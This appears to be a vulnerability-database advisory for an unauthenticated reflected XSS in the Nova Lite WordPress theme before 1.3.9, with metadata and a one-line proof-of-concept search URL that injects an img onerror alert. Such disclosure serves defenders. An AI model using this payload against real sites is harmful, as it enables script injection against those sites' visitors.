Themes Vulnerabilities
Nova Lite < 1.3.9 - Unauthenticated Reflected Cross-Site Scripting (XSS)
Description
The theme did not properly sanitise the search query, leading to an unauthenticated reflected Cross-Site Scripting issue
Proof of Concept
/?s=%3Cimg%20src%20onerror=alert(/XSS/)%3E
Affects Themes
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Talip Karabas
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2020-08-13 (about 3 years ago)
Added
2020-08-13 (about 3 years ago)
Last Updated
2020-08-14 (about 3 years ago)